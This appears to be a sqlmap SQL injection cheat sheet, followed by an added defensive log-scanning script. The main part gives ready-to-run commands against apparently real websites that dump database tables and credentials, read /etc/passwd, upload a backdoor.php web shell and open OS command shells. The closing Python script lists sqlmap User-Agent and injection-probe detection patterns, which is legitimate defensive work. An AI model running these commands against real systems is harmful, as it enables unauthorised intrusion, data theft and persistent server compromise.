sqlmap Quick Cheat Sheet

URL WRITING

Single URL

sqlmap -u http://signisasia.net/books/view?id=1 --dbs

Input Request from File

  • Capture the request with a browser HTTP-headers extension or Burp Suite
  • Save it to req.txt
sqlmap -r req.txt

Input Request from File (test only the username parameter)

  • Capture the request with a browser HTTP-headers extension or Burp Suite
  • Save it to req.txt
sqlmap -r req.txt -p username

Testing a pattern of URLs

  • If the injection point is a URL path segment rather than a query parameter, as in
http://signisasia.net/books/1/view
http://signisasia.net/books/2/view
http://signisasia.net/books/3/view
  • mark that segment with * and sqlmap tests it as the injection point, covering all such URLs with one command
sqlmap -u http://signisasia.net/books/*/view --dbs

POST Injection Directly

sqlmap -u http://imranparray.com/login.php --data "username=imx&pass=imx100&submit=Submit" -p username

> --data is the POST data sent in the request
> -p is the parameter to test (the injection point).

Using Cookies

sqlmap -u "http://imranparray.com/welcome/functionality.php?id=100" --cookie="PHPSESSID=adsaasd56454a6s54d54"

> sqlmap accepts a single -u; when the option is given twice only the last URL is used, so pass the target URL once and supply the session cookie with --cookie.

Scanning multiple targets

sqlmap -m urls.txt --dbs --batch

Exploitation

Extract Databases

sqlmap -u http://signisasia.net/becomemember.php?id=14 --dbs

Extract Tables from database

sqlmap -u http://signisasia.net/becomemember.php?id=14 -D database --tables

Extract Columns of table_name from database

sqlmap -u http://signisasia.net/becomemember.php?id=14 -D database -T table_name --columns

Dumping Data

sqlmap -u http://signisasia.net/becomemember.php?id=14 -D database -T table_name -C column1,column2,column3 --dump

Speeding Up the Process

Multithreading

sqlmap -u http://signisasia.net/books/view.php?id=100 --dbs --threads 5

Null-Connection

sqlmap -u http://signisasia.net/books/view.php?id=100 --dbs --null-connection

HTTP Persistent Connection

sqlmap -u http://signisasia.net/books/view.php?id=100 --dbs --keep-alive

Output prediction

sqlmap -u http://signisasia.net/books/view.php?id=100 -D database -T user -C users,password --dump --predict-output

File Privileges

Checking privileges

sqlmap -u http://signisasia.net/books/view.php?id=100 --privileges

Reading Files from the server

sqlmap -u http://signisasia.net/books/view.php?id=100 --file-read=/etc/passwd

Uploading Files/Shell

sqlmap -u http://signisasia.net/books/view.php?id=100 --file-write=/root/imxx/backdoor.php --file-dest=/var/www/imran.php

Getting Shells

Sql Shell

sqlmap -u http://imranparray.com/login.php?id=100 --sql-shell

OS shell

sqlmap -u http://imranparray.com/login.php?id=100 --os-shell

OS Command Execution without Shell Upload

sqlmap -u http://imranparray.com/login.php?id=100 --os-cmd "uname -a"

Using Proxy

sqlmap --proxy="127.0.0.1:8888" -u https://imranparray.com/home.php?id=12 --dbs
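Detecting the activity described in this cheat sheet from the defender's side, as an added example that is not part of the original page: the script below scans web server access-log lines (combined log format) for sqlmap's default User-Agent and for the injection probe fragments sqlmap sends during boolean-, union- and time-based testing. The log lines and IP addresses are constructed samples, and the User-Agent string is modelled on sqlmap's default.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /books/view.php?id=100 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /books/view.php?id=100%20AND%201%3D1 HTTP/1.1" 200 5123 "-" "sqlmap/1.7 (https://sqlmap.org)"
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /books/view.php?id=100%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:13:56:00 +0000] "GET /becomemember.php?id=14 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Indicator 1: sqlmap's default User-Agent starts with "sqlmap/". It is easy to change,
# so treat it as a weak signal on its own.
UA_RE = re.compile(r"^sqlmap/", re.IGNORECASE)
# Indicator 2: probe fragments typical of boolean-, union- and time-based testing,
# matched against the URL-decoded request path so encoding does not hide them.
PAYLOAD_RE = re.compile(
    r"(\bAND\b\s*\d+\s*=\s*\d+|\bUNION\b\s+(ALL\s+)?SELECT\b|\bSLEEP\s*\(|"
    r"\bWAITFOR\s+DELAY\b|\bBENCHMARK\s*\()",
    re.IGNORECASE,
)


def classify(line):
    """Return the indicator names found in one access-log line (empty list if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    hits = []
    if UA_RE.match(m.group("ua")):
        hits.append("sqlmap-user-agent")
    if PAYLOAD_RE.search(unquote_plus(m.group("path"))):
        hits.append("sqli-probe-in-url")
    return hits


def suspicious_sources(log_text):
    """Aggregate indicator counts per client IP; both indicators from one IP is a strong signal."""
    per_ip = {}
    for line in log_text.splitlines():
        hits = classify(line)
        if hits:
            bucket = per_ip.setdefault(line.split(" ", 1)[0], {})
            for h in hits:
                bucket[h] = bucket.get(h, 0) + 1
    return per_ip
```

Run it over a real access log by replacing SAMPLE_LOG with the file contents; the per-IP counts are what you would feed into an alert rule or a WAF block list review.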